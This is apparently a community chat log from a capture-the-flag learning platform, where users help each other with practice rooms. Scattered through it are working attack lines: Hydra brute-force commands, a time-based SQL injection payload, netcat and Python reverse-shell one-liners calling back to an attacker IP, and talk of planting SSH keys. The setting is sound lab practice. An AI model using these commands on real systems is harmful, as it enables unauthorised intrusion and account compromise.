probably dat means dont use rockyou.txt??

using rockyou.txt

which room is this

Hydra

imma try other wordlists then

your "pass/fail" check is probably wrong

Can we see the whole command?

I just did the room so I may be able to help you out.

@placid drift

remove the verbose flag and try again

This command should work.

yes

but the verbose flag spams the output

@wooden mist Doesn't matter. The command should stop as soon as it hits a valid combination.

ik

yea

oh wait

should be nothing wrong with using -V

your route is wrong

the login ?

remote /<IP> from the route

leave just /login

your command is wrong

oh im seeing something wrong here

oh damn, szy beat me to it

Is the URI wrong?

yes

found it

thanks for the help

hydra -l <user> -P pwlist <ip> http-post-form "/login:username .....

just realized it when i see

this

with verbose disabled it'd be easier to notice

Oh!

Yeah!!!!

What the hell?

So hard to spot.

But so obvious.

I have done a scan on Peak Hill.

Got 2 ports open.

Not sure what else to do.

I saw anonymous access.

Is that what I should go for?

do you see any other path you could take?

SSH brute force?

Maybe username enumeration on port 22

and then password brute.

That's all I can see nwo.

go with the easiest thing that you see

(that is probably anon ftp)

Maybe there's something python thing on FTP. I don't know. lol

Thanks for the hint.

Just looked up on ServerFault and had to do a "pass" before "dir"

Now I can see a file.

Thanks.

any hint for the the impossible room

not able to make sense of cipher text

Parse through the results. What is the effective estimated entropy measured in? it need i enter percentage ?

hi

hi
@white salmon hye?

@white salmon hye?
@rancid crystal i wrote in wrong channel sry

🙂

Any hints for wonderland root privexec

Automated privesc scanning scripts

Or this https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology and Resources/Linux - Privilege Escalation.md

I did run linpeas but let me go through the output once more. 😀

@void shoal you are more capable than you think

Noobie here (Only 1 hour in), I'm stumped on what the answer for task 12 on "Learn Linux" is.

man su

@glacial remnant Specificially for su

is it only 2 digits?

2 characters

Okay, I'm still unsure of what to enter as I've tried everything that appers when

man su
is enteres

*entered

You can scroll using the arrow keys

Look for one where the description matches

@stuck fractal Thank you, I don't know why but I just didn't spot it

Got it?

Yup

Cool

I need some help in room Hydra - Question 1 I'm brute forcing with rockyou.txt but I just saw in hint they say || If you've tried more than 30 passwords from RockYou.txt, you are doing something wrong! ||

I use this command to brute-force on web hydra -t 4 -V -f -l molly -P rockyou.txt rdp://$ip

@copper hound Have a look at your command

What protocol are you attacking there?

I'm new in web of hydra I didn't know actually what should I do I cheak a blog there they using this cmd....can I ask you for some resource ?

https://tryhackme.com/room/hydra

I'm doing this room 🙂 should I use http://$ip ?

Read the material you are given in the room

It will tell you exactly how to use hydra for this

ok thanks

May I ask for any hint to get flag3 (Python Playground)?
Finally completed. Write-up is ready and will be published soon.

LinPEAS

And look really close at the output

Can I get a some help on foothold for mindgames?

Didn't it just drop?

Yes

@quiet stump tbh, the foothold is trivial. Have a look at what you're given. RE it.

I was joking dw 😉

i rooted lordofroot

but wondering ||if there is a script to do it without sqlmap?||

even most guides used it

anyone know of a way without for the db part

I'm wondering the same @random cypress 🙃

i cant even fathom how much youd have to script yourself to get the same result

and im not finding anything on github etc

So, you could find what is in the SQLi error returned by SQLmap and try to recreate it.

' AND (SELECT *
FROM (SELECT(SLEEP(5)))PWKv) AND
'eVRP'='eVRP&submit= Login

Something like that in the address bar, but adjusted to the parameters you want.

please hint on privesc in mindgames

You are not getting a hint

It's only been out a couple hours.

40 minutes

@white salmon Elf, it's literally just come out

After it comes out

No way

It's a hard box

yes

any hint for the racetrack . I've got the premium feature

Something like that in the address bar, but adjusted to the parameters you want.
@patent token but my understanding is the username|| is whats vulnerable. or is that what you mean enter it in the address bar? also where did you get that poc? I understand it but im confused by your PWKv and eVRP values||

granted if this level of sqli is not on the exam for now its okay not knowing

if it is wow

I literally just copy/pasted one of the returns from sqlmap. SQLmap is using that information as an injection parameter.

For OSCP, if that's what you're referring to, will probably be more simplistic than that and throw an error or something that you can use.

ah i think i ignored its output a bit too much

just paying attetnion to the bright colors

thanks

I haven’t finished with playground and now there’s mindgames? It’s like my head’s about to burst

“Let people struggle”

hey i am trying to get a reverse shell on cod caper but i cant get it to send the actual shell. Any ideas?

netcat is listening

command that i sent is nc -e /bin/sh 10.2.17.239 4444

Try a different reverse shell command

i did

used bash + perl

and tried python

and telnet

even the command for if nc doesnt like -e

What was the python command you ran?

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

As well as the netcat command to listen?

nc -lvnp 4444

and i set the port

that one was copied off of highoncoffee

You have port 80

yes ik

thats not problem

i set it

Did you set the ip to your vpn ip?

And port to 4444?

yep

oh wait

the python one worked

after a couple tries

wait no

it doesnt

What happens

nothing

all it says is listening on [any] 4444 ...

Let’s move this to #room-help

sure

Hi guys, is there a writeup or explanation for the room "Intro to x86-64" ? I found password at task 6, but I was "lucky". I think I don't have the good way to reverse it. I'm not able to find the password for Task 7, I'm stuck since yesterday

when i try to run john, then it says [1] 37370 segmentation fault john shadow

any idea why?

command: john --wordlist=../Tools/SecLists/Passwords/Leaked-Databases/rockyou.txt.tar.gz shadow

@viscid egret firstly you need to extract the file

is it too early for hints in mindgames? lol

i assume so since james put that note in the task description about no livestreams

I’ll give you a hint

so is opening a reverse shell and shoving your ssh public key on a machine so you can log in via ssh and get a real shell cheating?

that's called being smart

stable shell in seconds B)

trying the mindgames

I do that every time I’m able to!

That's a sensible solution for mindgames

good to know

yeah I was trying to write a script to send a post to the transpiler, and then thought why am I not getting a reverse shell?

so there is repo pwncat made by john's roommate caleb, it gives u a stable shell with color and ctrl-c support. recently using that.. otherwise I used to do that as well.

bookmarked

Good morning from Australia.

Finally rooted python playground. Thanks to @wraith marsh and @white salmon for the nudges. On to mindgames!

Going to try Peak-Hill again.

Aaa pls hint on mind games privesc

hey working on steganography room and I am on tasks 5 last question I ran the tool and got a bin file but not sure how to run it and suggestions?

Hi guys I am having trouble with the flag 26 of the linux challenge. I have to find a string in the whole system that starts with 4bcbe and I´m using ||find / 2>/dev/null | grep "4bcbe*"|| but nothing shows up, can someone help me get into the right way?